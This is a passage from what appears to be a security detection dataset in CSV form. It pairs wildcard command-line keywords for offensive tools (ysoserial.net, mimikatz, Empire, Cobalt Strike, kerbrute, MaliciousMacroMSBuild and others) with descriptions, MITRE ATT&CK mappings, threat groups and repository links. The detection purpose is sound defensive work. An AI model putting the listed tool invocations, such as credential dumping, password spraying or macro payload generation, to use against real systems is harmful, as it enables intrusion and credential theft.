ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p CommonsCollections1 -c whoami*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* -p DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p LastLogonTimestamp -p LastLogonUserName *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* -p powershell -i *.ps1 -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p shellcode -i *.bin -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* -p:AssemblyName=inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"* papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"* parrot main *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot.run/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot-backports *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot-security *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --password-list *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"* -PathToDMP *.dmp*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"* -PathToGraph *.json -PathToPayload *.exe*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* --payload CommonsCollections*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* --payload_file * --payload_path*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"* --payloadcookie *","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"* --payload-file pwn.bat*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* PayloadType.BIND_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"* --payload-types all*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types ps1*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types py*","offensive_tool_keyword","cobaltstrike","This project is 